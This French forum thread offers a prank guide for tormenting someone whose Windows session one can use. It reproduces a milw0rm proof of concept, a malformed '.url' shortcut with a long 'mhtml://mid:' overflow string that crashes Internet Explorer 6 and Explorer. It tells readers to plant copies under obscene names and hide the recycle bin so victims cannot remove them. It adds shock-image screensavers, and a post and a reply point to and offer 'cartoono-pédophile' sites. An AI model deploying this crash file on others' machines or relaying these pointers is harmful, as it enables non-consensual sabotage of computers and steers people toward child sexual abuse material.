Sujet : [HowTo]Comment faire chier le monde.

Un Naab vous a pwnd a counter stroke ? Vous avez envie de suspendre l'argent de poche de votre petit frêre pendant 2 mois ? Vous avez tout simplement envie de vous foutre de la gueule de quelqu'un dont vous avez accès à la session ? Voici la solution !

1ère étape : La création de dossiers Anal Horses & Shemales sur le bureau, si le bureau est deja encombré, n'hesitez pas a nettoyer a coup de shift/del

2ème étape : On prend un beau screenchiotte du bureau et on le fout en fond d'ecran avant de supprimer les dossiers precedement créer.
Cela suffira peut être au petit frêre qui va passer un quart d'heure a essayer de supprimer les dossiers voir d'acceder aux vidéos à l'interieur mais la plupart des victimes auront vite compris l'astuce, on passe donc à la 3ème étape.

3ème étape : On créer un fichier txt sur le bureau et on copicolle ça dedans :

[DEFAULT]
BASEURL=
[InternetShortcut]
URL=mhtml://mid:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
/*
*
* Internet Explorer overflow Vulnerbility [Proof of concept]
* Bug discovered by Mr.Niega
* http://www.swerat.com/
*
* Affected Software: Microsoft Internet Explorer 6.x
* Severity: Unknown
* Impact: Crash
* Solution Status: Unpatched
*
* E-Mail: [email protected]
* Credits goes out to MarjinZ and Andvare
*
* Note: By right clicking on the file explorer will crash
* Note: del=crash,F2=crash Use cmd to delete file
* Remember to save the file with a .url extension.
*/

// milw0rm.com [2006-05-31]

On copicolle ensuite ce fichier autant qu'on veut toujours sur le bureau et on renomme les fichiers comme c'est écrit dans les commentaires en .url (par exemple cum fiesta.url, free p0rn.url ou encore Sylvia se prend un deluge de foutre.url).

En essayant de supprimer les raccourci internet la victime fera planter l'explorer, que ce soit avec del, shift/del ou clic droit.
En essayant de renommer en utilisant le clic droit, elle aura droit au meme resultat sa seule solution est donc d'utiliser la touche F2 pour renommer le fichier (la touche F2 marche sur le bureau mais fait planter explorer quand on l'utilise dans l'explorateur) ou de le supprimer avec des lignes de commandes.
Note : Le fait de faire un ctrl + x fait aussi un crash
Note 2 : Je viens de m'apercevoir qu'on peut tout simplement faire un clicker glisser sur la corbeille :\ mais en supprimant son icone du bureau avec clic droit -> proprieté -> bureau -> personalisation du bureau on peut enlever l'icone corbeille, normalement la victime ne devrait pas y penser.

Etape 4 : On change l'ecran de veille pour mettre objet 3d flottant et on choisis dans les parametre drapeau avec comme texture Goatse Et on regle l'ecran de veille sur 1 minute.

On peut aussi faire un tour sur les site cartoono-pedophile de Vak et mettre en fond d'ecran une image bien trash.

Voila, La semaine prochaine, nous apprendrons a lacher un couple de ragondin dans la maison de vacance de ses voisins.

La route ? Là où on va, on n’a pas besoin de route !

2

Re : [HowTo]Comment faire chier le monde.

Sauf que sauf erreur, ce n'est pas possible d'enlever l'icone corbeille du bureau sans manip hasardeuse, me semble-t'il (et en tous cas ta méthode ne fonctionne pas).

3

Re : [HowTo]Comment faire chier le monde.

J'ai déjà fait ça en gentil au taff:
-Prendre un screen du bureau et le mettre en fond d'écran.
-Mettre la barre de taches ailleurs et en cachée (genre à droite).
-Déplacer tous les icones du bureau dans un dossier ailleurs.
-si le gars est un noob, inverser les boutons de la souris.

C'est rigolo de le voir essayer de cliquer sur le démarrer en bas à droite qui est juste une image.

4

Re : [HowTo]Comment faire chier le monde.

ffiixx -> au pire on enleve aligner les icones sur la grille et on balance l'icone en haut a droite de l'ecran

La route ? Là où on va, on n’a pas besoin de route !

5

Re : [HowTo]Comment faire chier le monde.

Puis on le renomme et on met un icone qui n'a rien à voir.

6

Re : [HowTo]Comment faire chier le monde.

Si quelqu'un veut l'adresse de site cartoonos-pédophiles, demandez moi, je me ferais une joie de répondre.

I take a look at my enormous penis
and my troubles start melting away

Re : [HowTo]Comment faire chier le monde.

ça me rappelle quand au taf ma chef essayait de me prendre la main dans le sac toutes les semaines et qu'elle demandait des audits au service info pour qu'ils regardent si je planquais pas des fichiers de cul (j'en avais des gigas, sans parler des mp3...)
ils ont jamais rien trouvé, c'était sur le disque dur de ma chef...